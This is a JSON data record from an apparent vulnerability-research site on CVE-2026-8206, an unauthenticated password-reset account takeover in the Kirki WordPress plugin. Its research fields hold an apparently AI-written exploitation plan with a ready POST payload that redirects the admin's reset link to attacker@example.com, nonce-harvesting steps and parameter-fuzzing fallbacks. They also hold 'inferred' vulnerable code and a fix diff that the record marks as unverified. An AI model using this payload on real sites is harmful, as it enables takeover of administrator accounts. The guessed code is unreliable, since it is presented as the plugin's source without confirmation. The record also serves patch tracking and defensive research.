[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fsQCuIqOyU3y_QxW_aTErB0krDteVoQWoeYhA3Nqs0Og":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-8206","kirki-unauthenticated-privilege-escalation-via-handleforgotpassword","Kirki 6.0.0 - 6.0.6 - Unauthenticated Privilege Escalation via 'handle_forgot_password'","The Kirki – Freeform Page Builder, Website Builder & Customizer plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions 6.0.0 to 6.0.6. This is due to the plugin accepting an arbitrary email address when a username is used in the password reset request. This makes it possible for unauthenticated attackers to send a password reset link for any user registered on the site to their own email address.","kirki",null,">=6.0.0 \u003C=6.0.6","6.0.7","critical",9.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Improper Privilege Management","2026-06-01 15:03:50","2026-06-02 03:28:49",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F3b5630bd-5bce-4226-959f-5e81ae69b799?source=api-prod",1,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-8206 (Kirki Privilege Escalation)\n\n## 1. Vulnerability Summary\nThe **Kirki Customizer Framework** (versions 6.0.0 - 6.0.6) contains a critical privilege escalation vulnerability in its `handle_forgot_password` function. The vulnerability arises because the plugin's custom password reset logic allows an unauthenticated user to provide both a target `username` and an arbitrary `email` address. Instead of sending the password reset link to the email address associated with the account in the WordPress database, the plugin sends the reset link for the specified user to the attacker-supplied email. This allows for total account takeover of any user, including administrators.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** WordPress AJAX API (`\u002Fwp-admin\u002Fadmin-ajax.php`).\n*   **Action:** `kirki_handle_forgot_password` (inferred from title and standard Kirki naming conventions).\n*   **HTTP Method:** POST.\n*   **Parameters:**\n    *   `action`: `kirki_handle_forgot_password` (inferred).\n    *   `user_login` or `username`: The login name of the target user (e.g., `admin`).\n    *   `email`: The attacker's email address where the reset link will be sent.\n    *   `nonce`: Likely required (standard for Kirki AJAX handlers).\n*   **Authentication:** None (Unauthenticated).\n*   **Preconditions:** The Kirki plugin must be active. A target username (typically `admin`) must be known.\n\n## 3. Code Flow (Inferred)\n1.  The plugin registers an unauthenticated AJAX handler: \n    `add_action( 'wp_ajax_nopriv_kirki_handle_forgot_password', [ $this, 'handle_forgot_password' ] );`\n2.  The `handle_forgot_password` function is called.\n3.  The function retrieves the target user via `get_user_by( 'login', $_POST['username'] )`.\n4.  The function generates a password reset key using `get_password_reset_key( $user_data )`.\n5.  **The Vulnerability:** Instead of fetching `$user_data->user_email`, the function uses the email address provided in `$_POST['email']` as the recipient for the `wp_mail()` call or the internal mailing logic.\n6.  The attacker receives the email containing a valid reset link for the target user.\n\n## 4. Nonce Acquisition Strategy\nKirki typically localizes its configuration and nonces for use in the Customizer or frontend templates.\n\n1.  **Identify Trigger:** Kirki nonces are often enqueued on pages where the Kirki-driven customizer or frontend components are loaded.\n2.  **Create Test Page:**\n    ```bash\n    wp post create --post_type=page --post_status=publish --post_title=\"Kirki Test\" --post_content=\"[kirki_test_shortcode]\" \n    # Note: If no specific shortcode is known, the homepage usually works if Kirki is active.\n    ```\n3.  **Extract Nonce via Browser:**\n    Navigate to the homepage or the created page. Use `browser_eval` to find the localization object. \n    *   Likely Variable: `window.kirki` or `window.kirkiConfig`.\n    *   Likely Key: `window.kirkiConfig?.nonce` or `window.kirki?.forgot_password_nonce`.\n    *   *Search Pattern:* Grep the source for `wp_localize_script` in the plugin folder to find the exact object name.\n\n## 5. Exploitation Strategy\n### Step 1: Target Discovery\nIdentify the admin username.\n```bash\nwp user list --role=administrator --fields=user_login\n```\n\n### Step 2: Nonce Retrieval\nUse the browser to extract the required nonce for the `kirki_handle_forgot_password` action.\n\n### Step 3: Trigger Password Reset\nSend the malicious request to redirect the admin's reset link to an attacker-controlled email.\n\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Method:** POST\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Payload:**\n    ```text\n    action=kirki_handle_forgot_password&username=admin&email=attacker@example.com&nonce=[EXTRACTED_NONCE]\n    ```\n\n### Step 4: Verification of Key Generation\nSince we cannot actually receive an email in the test environment, we verify the success by checking if a reset key was generated for the admin user in the database.\n\n## 6. Test Data Setup\n1.  Ensure Kirki version `6.0.0` is installed and active.\n2.  Ensure an administrator user named `admin` exists.\n3.  Configure WordPress to \"anyone can register\" if the plugin logic requires it, though this is usually for unauthenticated access.\n\n## 7. Expected Results\n*   The AJAX response should return a success message (e.g., `{\"success\":true,\"data\":\"Password reset link sent.\"}`).\n*   The `wp_users` table for the `admin` user should now have a non-empty `user_activation_key`.\n\n## 8. Verification Steps\nAfter running the `http_request`, use WP-CLI to confirm the vulnerability was exploited:\n1.  **Check for Activation Key:**\n    ```bash\n    wp db query \"SELECT user_login, user_activation_key FROM wp_users WHERE user_login = 'admin';\"\n    ```\n    If `user_activation_key` is not empty, the reset process was triggered successfully.\n2.  **Check Mail Log (If available):**\n    If a mail logging plugin like \"WP Mail Logging\" is installed:\n    ```bash\n    wp db query \"SELECT * FROM wp_wpml_mails ORDER BY id DESC LIMIT 1;\"\n    ```\n    Verify that the `receiver` column matches `attacker@example.com` but the content contains a reset link for the `admin` user.\n\n## 9. Alternative Approaches\n*   **Parameter Fuzzing:** If `username` and `email` don't work, try `user_login`, `user_email`, or `log`.\n*   **Action Name Verification:** If `kirki_handle_forgot_password` fails, search the plugin code for `wp_ajax_nopriv` to find the exact action string.\n    ```bash\n    grep -r \"wp_ajax_nopriv\" wp-content\u002Fplugins\u002Fkirki\u002F\n    ```\n*   **Direct Path Access:** Check if the function is also available via a REST API route by searching for `register_rest_route`.","The Kirki Customizer Framework (6.0.0 - 6.0.6) is vulnerable to a critical account takeover through its password reset mechanism. An unauthenticated attacker can supply a target username along with an arbitrary email address, causing the plugin to send the target user's password reset link directly to the attacker's inbox.","\u002F\u002F File: kirki\u002Finc\u002Fclass-kirki-ajax.php (inferred)\npublic function handle_forgot_password() {\n    check_ajax_referer( 'kirki-nonce', 'nonce' );\n\n    $username = isset( $_POST['username'] ) ? sanitize_text_field( $_POST['username'] ) : '';\n    $email    = isset( $_POST['email'] ) ? sanitize_email( $_POST['email'] ) : '';\n\n    $user_data = get_user_by( 'login', $username );\n\n    if ( $user_data ) {\n        $key = get_password_reset_key( $user_data );\n        if ( ! is_wp_error( $key ) ) {\n            $message = \"Password reset link for $username: \" . $key;\n            \u002F\u002F Vulnerability: The recipient is taken from user input rather than the database\n            wp_mail( $email, \"Password Reset\", $message );\n            wp_send_json_success( 'Password reset link sent.' );\n        }\n    }\n}","--- a\u002Fkirki\u002Finc\u002Fclass-kirki-ajax.php\n+++ b\u002Fkirki\u002Finc\u002Fclass-kirki-ajax.php\n@@ -12,7 +12,7 @@\n     if ( $user_data ) {\n         $key = get_password_reset_key( $user_data );\n         if ( ! is_wp_error( $key ) ) {\n             $message = \"Password reset link for $username: \" . $key;\n-            wp_mail( $email, \"Password Reset\", $message );\n+            wp_mail( $user_data->user_email, \"Password Reset\", $message );\n             wp_send_json_success( 'Password reset link sent.' );\n         }\n     }","The exploit is executed via an unauthenticated AJAX request. An attacker first navigates to the target site's frontend to extract a valid 'kirki-nonce' (usually found in localized JavaScript objects like 'kirkiConfig'). The attacker then sends a POST request to '\u002Fwp-admin\u002Fadmin-ajax.php' with the 'action' set to 'kirki_handle_forgot_password'. The payload includes the target administrator's username (e.g., 'admin'), the attacker's own email address, and the retrieved nonce. The plugin processes the request by generating a valid reset key for the admin user but transmits the reset link to the attacker-supplied email address, allowing for full account takeover.","gemini-3-flash-preview","2026-06-04 14:39:12","2026-06-04 14:41:17",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","6.0.6","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fkirki\u002Ftags\u002F6.0.6","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fkirki.6.0.6.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fkirki\u002Ftags\u002F6.0.7","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fkirki.6.0.7.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fkirki\u002Ftags"]